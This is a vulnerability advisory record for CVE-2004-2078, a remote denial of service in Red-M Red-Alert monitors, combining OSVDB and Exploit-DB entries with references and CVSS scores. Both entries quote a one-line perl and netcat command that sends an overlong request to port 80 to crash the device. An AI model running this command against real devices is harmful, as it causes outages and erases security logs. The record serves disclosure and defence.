ID CVE-2004-2078 Type cve Reporter cve@mitre.org Modified 2017-07-11T01:31:00
Description
Red-M Red-Alert 2.7.5 with software 3.1 build 24 allows remote attackers to cause a denial of service (reboot and loss of logged events) via a long request to TCP port 80, possibly triggering a buffer overflow.
{"osvdb": [{"lastseen": "2017-04-28T13:19:58", "bulletinFamily": "software", "cvelist": ["CVE-2004-2078"], "edition": 1, "description": "## Vulnerability Description\nRed-Alert contains a flaw that may allow a remote denial of service. The issue is triggered when a very long string is sent to port 80, and will result in loss of availability for the platform.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Red-M has released a patch to address this vulnerability.\n## Short Description\nRed-Alert contains a flaw that may allow a remote denial of service. The issue is triggered when a very long string is sent to port 80, and will result in loss of availability for the platform.\n## Manual Testing Notes\nperl -e 'print \"a\"x1230 . \"\\r\\n\\r\\n\"| nc <device ip> 80 \n## References:\nVendor URL: http://www.red-m.com/\nVendor URL: http://www.red-m.com\nSecurity Tracker: 1009001\n[Secunia Advisory ID:10832](https://secuniaresearch.flexerasoftware.com/advisories/10832/)\n[Related OSVDB ID: 3953](https://vulners.com/osvdb/OSVDB:3953)\n[Related OSVDB ID: 3952](https://vulners.com/osvdb/OSVDB:3952)\nOther Advisory URL: http://genhex.org/releases/031003.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-02/0233.html\nISS X-Force ID: 15086\n[CVE-2004-2078](https://vulners.com/cve/CVE-2004-2078)\nBugtraq ID: 9618\n", "modified": "2004-02-08T07:08:46", "published": "2004-02-08T07:08:46", "href": "https://vulners.com/osvdb/OSVDB:3891", "id": "OSVDB:3891", "type": "osvdb", "title": "Red-Alert Long String DoS ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T21:32:14", "description": "Red-M Red-Alert 3.1 Remote Vulnerabilities. CVE-2004-2078. Dos exploit for hardware platform", "published": "2004-02-09T00:00:00", "type": "exploitdb", "title": "Red-M Red-Alert 3.1 - Remote Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2078"], "modified": "2004-02-09T00:00:00", "id": "EDB-ID:23672", "href": "https://www.exploit-db.com/exploits/23672/", "sourceData": "source: http://www.securityfocus.com/bid/9618/info\r\n\r\nProblems in various abilities have been identified in the Red-M Red-Alert network monitors. Because of this issues, an attacker may be able to crash a vulnerable device and eliminate logs, gain unauthorized access to the administrative interface, or partially evade detection by an affected device.\r\n\r\n$ perl -e 'print \"a\"x1230 . \"\\r\\n\\r\\n\"| nc <device ip> 80", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23672/"}]}